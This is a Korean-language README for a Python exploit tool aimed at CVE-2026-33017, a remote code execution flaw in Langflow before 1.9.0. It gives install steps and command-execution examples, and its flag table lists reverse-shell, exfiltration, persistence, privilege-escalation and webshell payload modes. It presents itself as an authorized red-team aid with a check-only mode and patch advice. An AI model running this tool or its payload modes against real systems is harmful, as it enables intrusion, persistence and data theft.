
Langflow <1.9.0용 CVE-2026-33017 악용 도구. 리버스 셸, 명령 실행, 파일 작업, 지속성 및 자동화된 테스트 기능을 제공합니다. 심각한 RCE 취약점의 영향을 검증합니다. 승인된 보안 평가에만 사용하십시오.
CVE-2026-33017 · Langflow 원격 코드 실행에 대한 승인된 보안 테스트
명시적으로 평가 권한을 부여받은 Langflow 인스턴스를 대상으로 CVE-2026-33017을 검증하기 위한 연구 및 레드팀 도구입니다. 무단 사용은 금지됩니다.
이 프로젝트는 오직 다음 용도로만 제공됩니다:
컴퓨터 시스템에 대한 무단 접근은 불법입니다. 테스트 대상에 대한 서면 승인을 받고 관련 법률을 준수할 책임은 전적으로 사용자에게 있습니다. 작성자는 오용에 대해 어떠한 책임도 지지 않습니다.
CVE-2026-33017의 영향을 받을 수 있는 Langflow 배포 환경을 평가하기 위한 비동기 Python 프레임워크입니다. 취약점 점검, 페이로드 모드 선택, 자동화된 평가 실행, 그리고 테스트 활동 문서화를 위한 구조화된 보고서 생성을 지원합니다.
| 항목 | 세부 정보 |
|---|---|
| CVE | CVE-2026-33017 |
| 대상 | Langflow |
| 권장 완화 조치 | Langflow ≥ 1.9.0 이상으로 업그레이드 |
| 언어 | Python 3.10+ |
| 버전 | 1.0.0 |
| 저자 | Sudeepa Wanigarathna |
--check-only 모드--auto / 배치 지향 실행httpx 기반flow-id 및 client-idgit clone https://github.com/CerberusMrXi/Langflow-cve-2026-33017-exploit
cd Langflow-cve-2026-33017-exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
--check-only
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "id"
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "uname -a" \
--report markdown \
--output-file report.md
python exploit.py -u URL -f FLOW_ID -c CLIENT_ID [options]
| 플래그 | 설명 |
|---|---|
-u, --url | 대상 기본 URL (예: http://127.0.0.1:7860) |
-f, --flow-id | Langflow 플로우 ID |
-c, --client-id | Client ID 쿠키 값 |
| 플래그 | 설명 |
|---|---|
-t, --payload-type | reverse_shell, bind_shell, command_exec, file_read, file_upload, persistence, priv_esc, data_exfil, meterpreter, webshell, all (기본값: reverse_shell) |
-l, --lhost | 리스너 호스트 (해당 시 생략하면 자동 감지) |
-p, --lport | 리스너 포트 (셸 / meterpreter 모드에 필수) |
--cmd | 명령 문자열 (command_exec) |
--file-path | 파일 읽기/업로드 모드용 경로 |
--file-data | 업로드 콘텐츠 (file_upload) |
| 플래그 | 설명 |
|---|---|
--auto | 자동화된 익스플로잇 워크플로우 |
--check-only | 취약점 점검만 수행 |
--batch | 배치 모드 |
--report | text | json | html | markdown |
--output-file | 보고서/출력을 파일로 저장 |
-v, --verbose | 상세 로깅 |
-q, --quiet | 오류만 표시 |
.
├── exploit.py # Main CLI & assessment engine
├── requirements.txt # Python dependencies
├── README.md # This file
└── venv/ # Local virtualenv (not for version control)
대상이 CVE-2026-33017에 취약한 경우:
--check-only를 다시 실행하여 패치 검증--check-only를 우선 사용하십시오신뢰성, 보고, 탐지 정확도 또는 방어 문서화를 개선하는 기여를 환영합니다. 변경 사항과 랩 환경에서의 검증 방법을 명확히 설명하는 이슈 또는 풀 리퀘스트를 열어 주십시오.
승인된 보안 테스트 및 교육용 연구 목적으로만 제공됩니다.
어떠한 보증도 제공되지 않습니다. 법률을 준수하고 본인의 책임 하에 사용하십시오.
Sudeepa Wanigarathna
승인된 보안 연구용 · CVE-2026-33017